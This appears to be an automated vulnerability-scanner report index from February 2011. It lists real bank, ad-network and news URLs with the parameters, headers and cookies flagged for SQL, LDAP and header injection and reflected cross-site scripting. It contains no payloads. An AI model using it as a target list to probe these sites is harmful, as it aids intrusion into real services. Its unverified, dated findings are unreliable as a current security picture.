XSS, SQL Injection, Cross Site Scripting, CWE-79, CWE-89, CWE-113, HTTP Header Injection, DORK

The Daily DORK Report for Feb. 3, 2011 | CloudScan Vulnerability Crawler

Report generated by CloudScan Vulnerability Crawler at Sun Feb 06 13:24:53 CST 2011.

DORK CWE-79 XSS Report

1. SQL injection

1.1. http://a.dlqm.net/adscgen/log_ut_err.php [REST URL parameter 2]

1.2. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [name of an arbitrarily supplied request parameter]

1.3. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [name of an arbitrarily supplied request parameter]

1.4. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter]

1.5. http://getcheckingaccountonline.com/ [Referer HTTP header]

1.6. http://getcheckingaccountonline.com/ [User-Agent HTTP header]

1.7. http://getcheckingaccountonline.com/click.php [User-Agent HTTP header]

1.8. http://getcheckingaccountsonlines.info/ [Referer HTTP header]

1.9. http://getcheckingaccountsonlines.info/ [User-Agent HTTP header]

1.10. http://getcheckingaccountsonlines.info/click.php [User-Agent HTTP header]

1.11. http://googleads.g.doubleclick.net/apps/domainpark/domainpark.cgi [ref parameter]

1.12. http://googleads.g.doubleclick.net/pagead/ads [num_ads parameter]

1.13. http://onlinecheckingservice.info/ [Referer HTTP header]

1.14. http://onlinecheckingservice.info/ [User-Agent HTTP header]

1.15. http://onlinecheckingservice.info/click.php [User-Agent HTTP header]

1.16. http://onlinecheckingservices.com/ [Referer HTTP header]

1.17. http://onlinecheckingservices.com/ [User-Agent HTTP header]

1.18. http://onlinecheckingservices.com/click.php [User-Agent HTTP header]

1.19. http://s1.srtk.net/www/delivery/rd.php [trackerid parameter]

1.20. http://urlwww--feedzilla--com.rtrk.com/tools/hcc.asp [RlocalTiming cookie]

1.21. http://www.bbt.com/bbt/ [REST URL parameter 1]

1.22. http://www.bbt.com/bbt/Business/Products/ [REST URL parameter 1]

1.23. http://www.bbt.com/bbt/Business/Products/ [REST URL parameter 2]

1.24. http://www.bbt.com/bbt/Business/Products/ [REST URL parameter 3]

1.25. http://www.bbt.com/bbt/Financial-Education/default.html [REST URL parameter 1]

1.26. http://www.bbt.com/bbt/Financial-Education/default.html [REST URL parameter 2]

1.27. http://www.bbt.com/bbt/Financial-Education/default.html [REST URL parameter 3]

1.28. http://www.bbt.com/bbt/Personal/Products/ [REST URL parameter 1]

1.29. http://www.bbt.com/bbt/Personal/Products/ [REST URL parameter 2]

1.30. http://www.bbt.com/bbt/Personal/Products/ [REST URL parameter 3]

1.31. http://www.bbt.com/bbt/about/ [REST URL parameter 1]

1.32. http://www.bbt.com/bbt/about/ [REST URL parameter 2]

1.33. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 1]

1.34. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 2]

1.35. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 3]

1.36. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 4]

1.37. http://www.bbt.com/bbt/about/privacyandsecurity/completeclientprotection/default.html [REST URL parameter 5]

1.38. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 1]

1.39. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 2]

1.40. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 3]

1.41. http://www.bbt.com/bbt/about/privacyandsecurity/onlinebankinglogin.html [REST URL parameter 4]

1.42. http://www.bbt.com/bbt/careers/ [REST URL parameter 1]

1.43. http://www.bbt.com/bbt/careers/ [REST URL parameter 2]

1.44. http://www.bbt.com/bbt/contactus.html [REST URL parameter 1]

1.45. http://www.bbt.com/bbt/contactus.html [REST URL parameter 2]

1.46. http://www.bbt.com/bbt/css/topNav.css [REST URL parameter 1]

1.47. http://www.bbt.com/bbt/css/topNav.css [REST URL parameter 2]

1.48. http://www.bbt.com/bbt/css/topNav.css [REST URL parameter 3]

1.49. http://www.bbt.com/bbt/customerservice/default.html [REST URL parameter 1]

1.50. http://www.bbt.com/bbt/customerservice/default.html [REST URL parameter 2]

1.51. http://www.bbt.com/bbt/customerservice/default.html [REST URL parameter 3]

1.52. http://www.bbt.com/bbt/default.html [REST URL parameter 1]

1.53. http://www.bbt.com/bbt/default.html [REST URL parameter 2]

1.54. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 1]

1.55. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 2]

1.56. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 3]

1.57. http://www.bbt.com/bbt/includes/chat/mtagconfig.js [REST URL parameter 4]

1.58. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 1]

1.59. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 2]

1.60. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 3]

1.61. http://www.bbt.com/bbt/includes/javascript/AC_RunActiveContent.js [REST URL parameter 4]

1.62. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 1]

1.63. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 2]

1.64. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 3]

1.65. http://www.bbt.com/bbt/includes/javascript/browserDetect.js [REST URL parameter 4]

1.66. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 1]

1.67. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 2]

1.68. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 3]

1.69. http://www.bbt.com/bbt/includes/javascript/new_window.js [REST URL parameter 4]

1.70. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 1]

1.71. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 2]

1.72. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 3]

1.73. http://www.bbt.com/bbt/includes/javascript/swapimage.js [REST URL parameter 4]

1.74. http://www.bbt.com/bbt/locator/default.html [REST URL parameter 1]

1.75. http://www.bbt.com/bbt/locator/default.html [REST URL parameter 2]

1.76. http://www.bbt.com/bbt/locator/default.html [REST URL parameter 3]

1.77. http://www.bbt.com/bbt/mobile/mobile-product.html [REST URL parameter 1]

1.78. http://www.bbt.com/bbt/mobile/mobile-product.html [REST URL parameter 2]

1.79. http://www.bbt.com/bbt/mobile/mobile-product.html [REST URL parameter 3]

1.80. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 1]

1.81. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 2]

1.82. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 3]

1.83. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 4]

1.84. http://www.bbt.com/bbt/personal/products/checkcard/default.html [REST URL parameter 5]

1.85. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 1]

1.86. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 2]

1.87. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 3]

1.88. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 4]

1.89. http://www.bbt.com/bbt/personal/products/onlinebanking/default.html [REST URL parameter 5]

1.90. http://www.bbt.com/bbt/sitemap.html [REST URL parameter 1]

1.91. http://www.bbt.com/bbt/sitemap.html [REST URL parameter 2]

1.92. http://www.citizensbank.com/everyday-points/default.aspx [Referer HTTP header]

1.93. http://www.regions.com/about_regions/careers.rf [REST URL parameter 1]

1.94. http://www.regions.com/about_regions/faqs.rf [REST URL parameter 1]

1.95. http://www.regions.com/about_regions/privacy_security.rf [REST URL parameter 1]

1.96. http://www.regions.com/about_regions/terms_conditions.rf [REST URL parameter 1]

1.97. http://www.regions.com/commercial_banking/tms_disbursing_funds.rf [REST URL parameter 1]

1.98. http://www.regions.com/demos/overview.rf [REST URL parameter 1]

1.99. http://www.regions.com/faq/javascript.rf [REST URL parameter 1]

1.100. http://www.regions.com/personal_banking/alternative_education_loans.rf [REST URL parameter 1]

1.101. http://www.regions.com/personal_banking/ehl.rf [REST URL parameter 1]

1.102. http://www.regions.com/personal_banking/get_started_online_statements.rf [REST URL parameter 1]

1.103. http://www.regions.com/personal_banking/online_banking_help.rf [REST URL parameter 1]

1.104. http://www.regions.com/personal_banking/online_statements.rf [REST URL parameter 1]

1.105. http://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1]

1.106. http://www.regions.com/personal_banking/regionsnet.rf [REST URL parameter 1]

1.107. http://www.regions.com/personal_banking/regionsnet_bill_pay.rf [REST URL parameter 1]

1.108. http://www.regions.com/promotion/black_history.rf [REST URL parameter 1]

1.109. http://www.regions.com/promotion/loans.rf [REST URL parameter 1]

1.110. http://www.regions.com/small_business/regionsnet_business.rf [REST URL parameter 1]

1.111. http://www.regions.com/system/unsupportedbrowser.rf [REST URL parameter 1]

1.112. https://www.regions.com/FAQ/insured_deposits.rf [REST URL parameter 1]

1.113. https://www.regions.com/about_regions/economic_update.rf [REST URL parameter 1]

1.114. https://www.regions.com/personal_banking/alternative_education_loans.rf [REST URL parameter 1]

1.115. https://www.regions.com/personal_banking/auto_loans.rf [REST URL parameter 1]

1.116. https://www.regions.com/personal_banking/cds.rf [REST URL parameter 1]

1.117. https://www.regions.com/personal_banking/checking.rf [REST URL parameter 1]

1.118. https://www.regions.com/personal_banking/credit_cards.rf [REST URL parameter 1]

1.119. https://www.regions.com/personal_banking/ehl.rf [REST URL parameter 1]

1.120. https://www.regions.com/personal_banking/email_starting_net.rf [REST URL parameter 1]

1.121. https://www.regions.com/personal_banking/everyday_banking.rf [REST URL parameter 1]

1.122. https://www.regions.com/personal_banking/get_started_online_statements.rf [REST URL parameter 1]

1.123. https://www.regions.com/personal_banking/home_equity_main.rf [REST URL parameter 1]

1.124. https://www.regions.com/personal_banking/insurance.rf [REST URL parameter 1]

1.125. https://www.regions.com/personal_banking/investing.rf [REST URL parameter 1]

1.126. https://www.regions.com/personal_banking/loan_payment_hardship.rf [REST URL parameter 1]

1.127. https://www.regions.com/personal_banking/loans_credit.rf [REST URL parameter 1]

1.128. https://www.regions.com/personal_banking/mobile_banking.rf [REST URL parameter 1]

1.129. https://www.regions.com/personal_banking/money_market_main.rf [REST URL parameter 1]

1.130. https://www.regions.com/personal_banking/morgan_keegan.rf [REST URL parameter 1]

1.131. https://www.regions.com/personal_banking/open_account.rf [REST URL parameter 1]

1.132. https://www.regions.com/personal_banking/platinum_visa_check.rf [REST URL parameter 1]

1.133. https://www.regions.com/personal_banking/private_client.rf [REST URL parameter 1]

1.134. https://www.regions.com/personal_banking/regionsnet.rf [REST URL parameter 1]

1.135. https://www.regions.com/personal_banking/regionsnet_bill_pay.rf [REST URL parameter 1]

1.136. https://www.regions.com/personal_banking/retirement_planning.rf [REST URL parameter 1]

1.137. https://www.regions.com/personal_banking/savings_cds.rf [REST URL parameter 1]

1.138. https://www.regions.com/personal_banking/trust_asset.rf [REST URL parameter 1]

1.139. https://www.regions.com/system/gateway.rf [REST URL parameter 1]

1.140. https://www.suntrust.com/portal/server.pt/community/checking_account_selector/440 [REST URL parameter 4]

2. LDAP injection

2.1. http://www.local.com/ [anonId cookie]

2.2. http://www.thestreet.com/story/10991463/1/bankatlantic-teams-with-intuit-financial-services-to-launch-8220this-way-to-25k8221-turbotax-for-online-banking-sweepstakes.html [REST URL parameter 2]

2.3. https://www.wellsfargo.com/insurance/property/home/buying [ISD_WCM_COOKIE cookie]

2.4. https://www.wellsfargo.com/mobile/onaphone/ [ISD_WCM_COOKIE cookie]

2.5. https://www.wellsfargo.com/mortgage/articles/rewards [ISD_WCM_COOKIE cookie]

2.6. https://www.wellsfargo.com/wfonline/deposit_details [ISD_WCM_COOKIE cookie]

3. HTTP header injection

3.1. http://102.xg4ken.com/media/redir.php [client parameter]

3.2. http://102.xg4ken.com/media/redir.php [name of an arbitrarily supplied request parameter]

3.3. http://18.xg4ken.com/media/redir.php [url[] parameter]

3.4. http://ad.br.doubleclick.net/getcamphist [src parameter]

3.5. http://ad.doubleclick.net/ad/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]

3.6. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.12 [REST URL parameter 1]

3.7. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.13 [REST URL parameter 1]

3.8. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.14 [REST URL parameter 1]

3.9. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.15 [REST URL parameter 1]

3.10. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.6 [REST URL parameter 1]

3.11. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.67 [REST URL parameter 1]

3.12. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.7 [REST URL parameter 1]

3.13. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.71 [REST URL parameter 1]

3.14. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.73 [REST URL parameter 1]

3.15. http://ad.doubleclick.net/ad/N884.AccuWeather/B4902356.74 [REST URL parameter 1]

3.16. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [REST URL parameter 1]

3.17. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

3.18. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [REST URL parameter 1]

3.19. http://ad.doubleclick.net/adi/ocr.sant.ocregister/homepage [REST URL parameter 1]

3.20. http://ad.doubleclick.net/adj/N3285.google/B2343920.135 [REST URL parameter 1]

3.21. http://ad.doubleclick.net/adj/N553.158901.DATAXU/B4970757.4 [REST URL parameter 1]

3.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [REST URL parameter 1]

3.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [REST URL parameter 1]

3.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [REST URL parameter 1]

3.25. http://ad.doubleclick.net/adj/accuwx.us.radarandmaps/satellite [REST URL parameter 1]

3.26. http://ad.doubleclick.net/adj/locm.pp [REST URL parameter 1]

3.27. http://ad.doubleclick.net/adj/locm.sp [REST URL parameter 1]

3.28. http://ad.doubleclick.net/adj/locm.sp/retail_banks_15020100 [REST URL parameter 1]

3.29. http://ad.doubleclick.net/adj/ocr.sant.ocregister/homepage [REST URL parameter 1]

3.30. http://ad.doubleclick.net/jump/N3867.605.ACCUWEATHER/B5097428.13 [REST URL parameter 1]

3.31. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.13 [REST URL parameter 1]

3.32. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.14 [REST URL parameter 1]

3.33. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.6 [REST URL parameter 1]

3.34. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.67 [REST URL parameter 1]

3.35. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.7 [REST URL parameter 1]

3.36. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.71 [REST URL parameter 1]

3.37. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.72 [REST URL parameter 1]

3.38. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.73 [REST URL parameter 1]

3.39. http://ad.doubleclick.net/jump/N884.AccuWeather/B4902356.74 [REST URL parameter 1]

3.40. http://ad.doubleclick.net/jump/locm.pp [REST URL parameter 1]

3.41. http://ad.doubleclick.net/jump/locm.sp [REST URL parameter 1]

3.42. http://ad.doubleclick.net/jump/locm.sp/retail_banks_15020100 [REST URL parameter 1]

3.43. https://ad.doubleclick.net/activity [name of an arbitrarily supplied request parameter]

3.44. https://ad.doubleclick.net/activity [src parameter]

3.45. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp [eyeblaster cookie]

3.46. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp [eyeblaster cookie]

3.47. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]

3.48. http://bs.serving-sys.com/BurstingPipe/adServer.bs [flv parameter]

3.49. http://bs.serving-sys.com/BurstingPipe/adServer.bs [res parameter]

3.50. http://bs.serving-sys.com/BurstingPipe/adServer.bs [wmpv parameter]

3.51. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

3.52. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

3.53. https://customercare.suntrust.com/guides/bus_services.asp [REST URL parameter 1]

3.54. https://customercare.suntrust.com/guides/contact_us.asp [REST URL parameter 1]

3.55. https://customercare.suntrust.com/guides/credit_cards.asp [REST URL parameter 1]

3.56. https://customercare.suntrust.com/guides/deposits.asp [REST URL parameter 1]

3.57. https://customercare.suntrust.com/guides/marine_lending.asp [REST URL parameter 1]

3.58. https://customercare.suntrust.com/guides/merchant_services.asp [REST URL parameter 1]

3.59. https://customercare.suntrust.com/guides/mort_services.asp [REST URL parameter 1]

3.60. http://tacoda.at.atwola.com/rtx/r.js [N cookie]

3.61. http://tacoda.at.atwola.com/rtx/r.js [si parameter]

3.62. http://www.supermedia.com/business-listings/business-profile [&tsrc parameter]

3.63. http://www.supermedia.com/spportal/spportalFlow.do [REST URL parameter 2]

4. Cross-site scripting (reflected)

4.1. http://ad.adnetinteractive.com/st [name of an arbitrarily supplied request parameter]

4.2. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [adurl parameter]

4.3. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [ai parameter]

4.4. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [client parameter]

4.5. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [num parameter]

4.6. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [sig parameter]

4.7. http://ad.doubleclick.net/adi/N3285.google/B2343920.135 [sz parameter]

4.8. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [adurl parameter]

4.9. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [ai parameter]

4.10. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [client parameter]

4.11. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [num parameter]

4.12. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [sig parameter]

4.13. http://ad.doubleclick.net/adi/N6036.GoogleFinance/B5133220.11 [sz parameter]

4.14. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [adurl parameter]

4.15. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [adurl parameter]

4.16. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [ai parameter]

4.17. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [ai parameter]

4.18. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [client parameter]

4.19. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [client parameter]

4.20. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [num parameter]

4.21. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [num parameter]

4.22. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sig parameter]

4.23. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sig parameter]

4.24. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sz parameter]

4.25. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.15 [sz parameter]

4.26. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [adurl parameter]

4.27. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [adurl parameter]

4.28. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [ai parameter]

4.29. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [ai parameter]

4.30. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [client parameter]

4.31. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [client parameter]

4.32. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [num parameter]

4.33. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [num parameter]

4.34. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sig parameter]

4.35. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sig parameter]

4.36. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sz parameter]

4.37. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.16 [sz parameter]

4.38. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [adurl parameter]

4.39. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [adurl parameter]

4.40. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [ai parameter]

4.41. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [ai parameter]

4.42. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [client parameter]

4.43. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [client parameter]

4.44. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [num parameter]

4.45. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [num parameter]

4.46. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter]

4.47. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sig parameter]

4.48. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sz parameter]

4.49. http://ad.doubleclick.net/adj/N5776.google.comOX2416/B5111410.18 [sz parameter]

4.50. http://ad.yieldmanager.com/v0/admeld-match [admeld_callback parameter]

4.51. http://admeld-match.dotomi.com/admeld/match [admeld_adprovider_id parameter]

4.52. http://admeld-match.dotomi.com/admeld/match [admeld_callback parameter]

4.53. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_adprovider_id parameter]

4.54. http://admeld.lucidmedia.com/clicksense/admeld/match [admeld_callback parameter]

4.55. http://ads.adsonar.com/adserving/getAds.jsp [pid parameter]

4.56. http://ads.adsonar.com/adserving/getAds.jsp [placementId parameter]

4.57. http://ads.adsonar.com/adserving/getAds.jsp [ps parameter]

4.58. http://ads.bluelithium.com/st [name of an arbitrarily supplied request parameter]

4.59. http://ads.roiserver.com/tag.jsp [h parameter]

4.60. http://ads.roiserver.com/tag.jsp [pid parameter]

4.61. http://ads.roiserver.com/tag.jsp [w parameter]

4.62. http://ads.specificmedia.com/serve/v=5 [m parameter]

4.63. http://ads.specificmedia.com/serve/v=5 [name of an arbitrarily supplied request parameter]

4.64. http://adserving.cpxinteractive.com/st [name of an arbitrarily supplied request parameter]

4.65. http://api.bing.com/qsonhs.aspx [q parameter]

4.66. http://as00.estara.com/as/InitiateCall2.php [template parameter]

4.67. http://as00.estara.com/as/commonlink.php [urid parameter]

4.68. http://as00.estara.com/as/commonlink.php [urid parameter]

4.69. http://b.scorecardresearch.com/beacon.js [c1 parameter]

4.70. http://b.scorecardresearch.com/beacon.js [c10 parameter]

4.71. http://b.scorecardresearch.com/beacon.js [c15 parameter]

4.72. http://b.scorecardresearch.com/beacon.js [c2 parameter]

4.73. http://b.scorecardresearch.com/beacon.js [c3 parameter]

4.74. http://b.scorecardresearch.com/beacon.js [c4 parameter]

4.75. http://b.scorecardresearch.com/beacon.js [c5 parameter]

4.76. http://b.scorecardresearch.com/beacon.js [c6 parameter]

4.77. http://bh.contextweb.com/bh/sync/admeld [admeld_adprovider_id parameter]

4.78. http://bh.contextweb.com/bh/sync/admeld [admeld_callback parameter]

4.79. http://business-news.thestreet.com/ocregister [name of an arbitrarily supplied request parameter]

4.80. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.81. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.82. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.83. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [$ parameter]

4.84. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [name of an arbitrarily supplied request parameter]

4.85. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.86. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.87. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.88. http://c7.zedo.com/bar/v16-401/c5/jsc/fm.js [q parameter]

4.89. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

4.90. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [$ parameter]

4.91. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [name of an arbitrarily supplied request parameter]

4.92. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]

4.93. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js [q parameter]

4.94. http://citi.bridgetrack.com/cbol/10/tiered_checking/default.htm [CMP parameter]

4.95. http://common.cdn.onset.freedom.com/tools/load.php [css parameter]

4.96. http://common.cdn.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]

4.97. http://common.cdn.onset.freedom.com/tools/load.php [scode parameter]

4.98. http://common.onset.freedom.com/fi/analytics/cms/ [ctype parameter]

4.99. http://common.onset.freedom.com/fi/analytics/cms/ [domain parameter]

4.100. http://common.onset.freedom.com/fi/analytics/cms/ [domain parameter]

4.101. http://common.onset.freedom.com/fi/analytics/cms/ [ghier parameter]

4.102. http://common.onset.freedom.com/tools/load.php [css parameter]

4.103. http://common.onset.freedom.com/tools/load.php [js parameter]

4.104. http://common.onset.freedom.com/tools/load.php [js parameter]

4.105. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]

4.106. http://common.onset.freedom.com/tools/load.php [name of an arbitrarily supplied request parameter]

4.107. http://common.onset.freedom.com/tools/load.php [scode parameter]

4.108. http://common.onset.freedom.com/tools/load.php [scode parameter]

4.109. http://da.newstogram.com/hg.php [callback parameter]

4.110. http://da.newstogram.com/hg.php [name of an arbitrarily supplied request parameter]

4.111. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [REST URL parameter 3]

4.112. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [REST URL parameter 4]

4.113. http://daffodil.acsevents.org/site/TR/DaffodilDays/DDFY10Pennsylvania [name of an arbitrarily supplied request parameter]

4.114. http://ds.addthis.com/red/psi/sites/mapserver.superpages.com/p.json [callback parameter]

4.115. http://easycheckingbanking.com/ [keyword parameter]

4.116. http://easycheckingbanking.com/ [name of an arbitrarily supplied request parameter]

4.117. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [REST URL parameter 5]

4.118. http://economy.ocregister.com/2011/02/03/o-c-in-top-three-for-job-growth/48434/ [name of an arbitrarily supplied request parameter]

4.119. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]

4.120. http://events.ocregister.com/ [name of an arbitrarily supplied request parameter]

4.121. http://events.ocregister.com/json [jsonsp parameter]

4.122. http://events.ocregister.com/movies [name of an arbitrarily supplied request parameter]

4.123. http://events.ocregister.com/restaurants [name of an arbitrarily supplied request parameter]

4.124. http://events.ocregister.com/search [st_select parameter]

4.125. http://events.ocregister.com/search [st_select parameter]

4.126. http://events.ocregister.com/search [st_select parameter]

4.127. http://events.ocregister.com/search [st_select parameter]

4.128. http://events.ocregister.com/search [svt parameter]

4.129. http://events.ocregister.com/search [swhat parameter]

4.130. http://events.ocregister.com/search [swhat parameter]

4.131. http://events.ocregister.com/search [swhen parameter]

4.132. http://events.ocregister.com/search [swhere parameter]

4.133. http://events.ocregister.com/venues [name of an arbitrarily supplied request parameter]

4.134. http://events.orangecounty.com/ [name of an arbitrarily supplied request parameter]

4.135. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [REST URL parameter 5]

4.136. http://fastfood.ocregister.com/2011/02/03/chain-to-use-eco-friendly-bike-to-deliver-pizzas-super-bowl-sunday/86514/ [name of an arbitrarily supplied request parameter]

4.137. http://gsbmtg.rtrk.com/ [name of an arbitrarily supplied request parameter]

4.138. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [cid parameter]

4.139. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [cid parameter]

4.140. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [dynamic_proxy parameter]

4.141. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [dynamic_proxy parameter]

4.142. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]

4.143. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [name of an arbitrarily supplied request parameter]

4.144. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [primary_serv parameter]

4.145. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [primary_serv parameter]

4.146. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_key parameter]

4.147. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_key parameter]

4.148. http://gsbmtg.rtrk.com/coupon/d544/544003/index4.html [rl_track_landing_pages parameter]

